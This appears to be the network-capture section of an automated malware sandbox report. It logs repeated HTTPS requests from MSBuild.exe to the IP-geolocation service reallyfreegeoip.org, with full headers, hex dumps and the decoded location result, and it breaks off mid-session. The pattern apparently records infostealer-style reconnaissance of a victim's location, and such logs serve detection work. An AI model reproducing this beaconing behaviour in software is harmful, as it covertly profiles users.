                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38158
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bsOdSEQVQjWhDSS66EVixRL4VkgY3W16N2g5Jst5ieznkgQkWLJMo0HJdg13fucE0AJ0sh9O5xfBAe4ge468MRkISiv5CRFanyX%2FfRnhzDOoZ9XhQQUAXAGrrMIF0PGyboJWeyr5"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f592a5c477b-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2016&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=701&delivery_rate=1421698&cwnd=251&unsent_bytes=0&cid=fb4ded9134c4b993&ts=163&x=0"
                                              2024-11-06 16:02:47 UTC156INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
                                              2024-11-06 16:02:47 UTC203INData Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.656858188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:49 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-06 16:02:49 UTC1221INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:49 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38160
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NkIsQdLTo21YgOdL3eh2QXr4qnITGeuVsUSjY3Gl0L2XmB45JYRWXJ%2FGcAd5VHru7A3vvplDbcVDVAEe%2BD4hkCBpx4T%2B%2BuPavIo1v%2FyZnViYQ6fPBvszEF3UHhJfTl5DJdc3jc6"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f635e68e716-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=2456&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1196694&cwnd=251&unsent_bytes=0&cid=13b3ee98a4161196&ts=174&x=0"
                                              2024-11-06 16:02:49 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                              2024-11-06 16:02:49 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.656857188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:49 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:49 UTC1221INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:49 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38160
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=73o%2FuNHuoAIibD11hUF6vjmQQ%2FAO0ca9uMVnaUGLcI8QSGL0HkinEZrns1NazMBPziYQmZn0v1tJgwf%2BkDZvkB4%2F7nU4DT24m1BmB3lpHhxctuWh%2FN25oa1TDB5IH0DxemAv43iW"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f64ecda47fd-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1874&sent=7&recv=7&lost=0&retrans=2&sent_bytes=5700&recv_bytes=701&delivery_rate=707376&cwnd=211&unsent_bytes=0&cid=4adeedf844a805bc&ts=1075&x=0"
                                              2024-11-06 16:02:49 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                              2024-11-06 16:02:49 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.656868188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:50 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-06 16:02:51 UTC1211INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:51 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38162
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BqfKrt7mLxEM1bU1HH5DX0bcYol0bMAPEVVXjGz3GyMLu1G6pBrZg8wGu69Es4qZIsmUkIsTfUIFqrQxNtNxk1gCdt7Xc2J9hmxOrDg531tDEPJI2tD0bsMK7zzsBxM3OPY2NmTZ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f6ccd646b0b-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1688629&cwnd=251&unsent_bytes=0&cid=8d096df79227781d&ts=179&x=0"
                                              2024-11-06 16:02:51 UTC158INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
                                              2024-11-06 16:02:51 UTC201INData Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.656869188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:51 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:51 UTC1219INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:51 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38162
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fk%2FNonWHqlbrhHK3XfQ3UIQL956N2xFvKumrfOLE9%2FPXMIxPK0Lhe5JnCJJvKcJMfVJVvX8DJRqQrsKf8lRpmnexGQFndKTnZ6o9wAzxN%2BHomvx6goLFutmm3ltYE%2FqM39AcKGQR"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f6d7efbeaee-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1377&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2329847&cwnd=251&unsent_bytes=0&cid=3a4819330db548ba&ts=165&x=0"
                                              2024-11-06 16:02:51 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                              2024-11-06 16:02:51 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.656880188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:52 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-11-06 16:02:52 UTC1213INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:52 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: f82078ca-afc9-49d9-a069-17b9c217bb0b
                                              x-amzn-trace-id: Root=1-672afe19-4f30f76b7a34a0f953191245;Parent=529078be23d2486a;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 e316b59dcccd0d0a0f7515e0735beb68.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DFW57-P5
                                              x-amz-cf-id: -Swr5qbOQdl3bj7Oc7hw3i50AA3lkZIDYOLYOADaQcjijlUp1iiPRA==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 38163
                                              Last-Modified: Wed, 06 Nov 2024 05:26:49 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N1QzEvocrtzFS8FLvXJdLY6loIc658INlZAAiHv0Cq8ihs1fxlPKYDDDQMr5gt76ZB1hQLKF43Wx3g4lT0q7WltJi8nezGtW7njzBEE6JZlS6%2BojEjh7lj2BzCazyVQJUtbXR3Ma"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f77cae86c10-DFW
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1115&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2549295&cwnd=251&unsent_bytes=0&cid=def75cd627a024bb&ts=188&x=0"
                                              2024-11-06 16:02:52 UTC156INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas
                                              2024-11-06 16:02:52 UTC203INData Raw: 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: </RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.656886188.114.96.34437200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:53 UTC87OUTGET /xml/173.254.250.80 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-11-06 16:02:54 UTC1217INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:54 GMT
                                              Content-Type: text/xml
                                              Content-Length: 359
                                              Connection: close
                                              x-amzn-requestid: 68d8c802-f830-4d99-b22d-aa66a416d868
                                              x-amzn-trace-id: Root=1-672b818e-3fe698b34e09e04b5ebcaf79;Parent=0b99835eeee52a0d;Sampled=0;Lineage=1:fc9e8231:0
                                              x-cache: Miss from cloudfront
                                              via: 1.1 f923e65cfb5d73f11ea9a89d42fad5fc.cloudfront.net (CloudFront)
                                              x-amz-cf-pop: DEN52-C1
                                              x-amz-cf-id: VAMjkjwUr0TN8uZkoUg74pQ78zDtUU3uyR1s9VYeqs4wXz8gbpFGsw==
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 4512
                                              Last-Modified: Wed, 06 Nov 2024 14:47:42 GMT
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2NeoJH8w3yol%2FKhdvFI1XIphQQ6FF2w1wT8XGFhqrebg1TTm9B0cqqQZxpRnRv1RmMzF%2Fd7A%2BIHqZSK8As9vrd6dU4aosKb8F%2Bbr5R1KIrSL2Fbloi1LhGnoupqFaROIIIKcfQl"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8de64f802df1e769-DEN
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=19058&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152742&cwnd=32&unsent_bytes=0&cid=956f5e6fe70d32a0&ts=458&x=0"
                                              2024-11-06 16:02:54 UTC152INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54
                                              Data Ascii: <Response><IP>173.254.250.80</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
                                              2024-11-06 16:02:54 UTC207INData Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                              Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.656891188.114.96.34437636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              2024-11-06 16:02:54 UTC63OUTGET /xml/173.254.250.80 HTTP/1.1
